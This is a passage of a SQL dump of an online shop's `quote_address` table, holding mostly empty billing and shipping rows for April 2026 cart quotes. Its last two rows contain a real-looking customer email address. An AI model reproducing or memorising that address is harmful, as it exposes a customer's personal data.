(1521, 944, '2026-04-08 09:51:21', '2026-04-08 09:51:21', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1522, 944, '2026-04-08 09:51:21', '2026-04-08 09:51:21', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1523, 945, '2026-04-08 11:36:23', '2026-04-08 11:36:23', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1524, 945, '2026-04-08 11:36:23', '2026-04-08 11:36:23', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1525, 946, '2026-04-08 16:57:49', '2026-04-08 16:57:49', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1526, 946, '2026-04-08 16:57:49', '2026-04-08 16:57:49', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1527, 947, '2026-04-08 17:12:06', '2026-04-08 17:12:06', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1528, 947, '2026-04-08 17:12:06', '2026-04-08 17:12:23', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 6.0000, 2532.0000, 2532.0000, 2025.6000, 2025.6000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -506.4000, -506.4000, 2025.6000, 2025.6000, NULL, '[]', NULL, 0.0000, 0.0000, 2532.0000, 2532.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1529, 948, '2026-04-08 18:41:59', '2026-04-08 18:41:59', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1530, 948, '2026-04-08 18:41:59', '2026-04-08 18:41:59', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1531, 949, '2026-04-08 23:43:51', '2026-04-08 23:43:51', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1532, 949, '2026-04-08 23:43:51', '2026-04-08 23:43:51', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1533, 950, '2026-04-09 03:43:23', '2026-04-09 03:43:23', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1534, 950, '2026-04-09 03:43:23', '2026-04-09 03:43:23', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1535, 951, '2026-04-09 05:27:45', '2026-04-09 05:27:45', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1536, 951, '2026-04-09 05:27:45', '2026-04-09 05:28:29', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 966.0000, 966.0000, 772.8000, 772.8000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -193.2000, -193.2000, 772.8000, 772.8000, NULL, '[]', NULL, 0.0000, 0.0000, 966.0000, 966.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1537, 952, '2026-04-09 05:27:52', '2026-04-09 05:27:52', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1538, 952, '2026-04-09 05:27:52', '2026-04-09 05:27:52', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1539, 953, '2026-04-09 05:27:53', '2026-04-09 05:27:53', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1540, 953, '2026-04-09 05:27:53', '2026-04-09 05:27:53', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0);
INSERT INTO `quote_address` (`address_id`, `quote_id`, `created_at`, `updated_at`, `customer_id`, `save_in_address_book`, `customer_address_id`, `address_type`, `email`, `prefix`, `firstname`, `middlename`, `lastname`, `suffix`, `company`, `street`, `city`, `region`, `region_id`, `postcode`, `country_id`, `telephone`, `fax`, `same_as_billing`, `collect_shipping_rates`, `shipping_method`, `shipping_description`, `weight`, `subtotal`, `base_subtotal`, `subtotal_with_discount`, `base_subtotal_with_discount`, `tax_amount`, `base_tax_amount`, `shipping_amount`, `base_shipping_amount`, `shipping_tax_amount`, `base_shipping_tax_amount`, `discount_amount`, `base_discount_amount`, `grand_total`, `base_grand_total`, `customer_notes`, `applied_taxes`, `discount_description`, `shipping_discount_amount`, `base_shipping_discount_amount`, `subtotal_incl_tax`, `base_subtotal_total_incl_tax`, `discount_tax_compensation_amount`, `base_discount_tax_compensation_amount`, `shipping_discount_tax_compensation_amount`, `base_shipping_discount_tax_compensation_amnt`, `shipping_incl_tax`, `base_shipping_incl_tax`, `vat_id`, `vat_is_valid`, `vat_request_id`, `vat_request_date`, `vat_request_success`, `validated_country_code`, `validated_vat_number`, `gift_message_id`, `free_shipping`) VALUES
(1541, 954, '2026-04-09 05:27:54', '2026-04-09 05:27:54', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1542, 954, '2026-04-09 05:27:54', '2026-04-09 05:27:54', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1543, 955, '2026-04-09 05:27:56', '2026-04-09 05:27:56', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1544, 955, '2026-04-09 05:27:56', '2026-04-09 05:27:56', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1545, 956, '2026-04-09 05:27:57', '2026-04-09 05:27:57', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1546, 956, '2026-04-09 05:27:57', '2026-04-09 05:27:57', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1547, 957, '2026-04-09 05:27:58', '2026-04-09 05:27:58', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1548, 957, '2026-04-09 05:27:58', '2026-04-09 05:27:58', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1549, 958, '2026-04-09 06:19:50', '2026-04-09 06:19:50', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1550, 958, '2026-04-09 06:19:50', '2026-04-09 06:19:50', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1551, 959, '2026-04-09 06:19:57', '2026-04-09 06:19:57', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1552, 959, '2026-04-09 06:19:57', '2026-04-09 06:19:57', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, NULL, '[]', NULL, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1553, 960, '2026-04-09 06:39:29', '2026-04-09 06:39:29', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1554, 960, '2026-04-09 06:39:29', '2026-04-09 06:39:29', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1555, 961, '2026-04-09 06:55:16', '2026-04-09 06:55:16', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1556, 961, '2026-04-09 06:55:16', '2026-04-09 06:55:16', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1557, 962, '2026-04-09 06:55:20', '2026-04-09 06:55:20', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1558, 962, '2026-04-09 06:55:20', '2026-04-09 06:55:20', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, NULL, '[]', NULL, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1559, 963, '2026-04-09 13:04:19', '2026-04-09 13:04:19', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1560, 963, '2026-04-09 13:04:19', '2026-04-09 13:04:19', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1561, 964, '2026-04-09 14:01:36', '2026-04-09 14:01:36', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1562, 964, '2026-04-09 14:01:36', '2026-04-09 14:01:36', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1563, 965, '2026-04-09 14:21:42', '2026-04-09 14:21:42', 132, 0, NULL, 'billing', 'uq.o.h.ah.i.hejo45@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1564, 965, '2026-04-09 14:21:42', '2026-04-09 14:21:42', 132, 0, NULL, 'shipping', 'uq.o.h.ah.i.hejo45@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
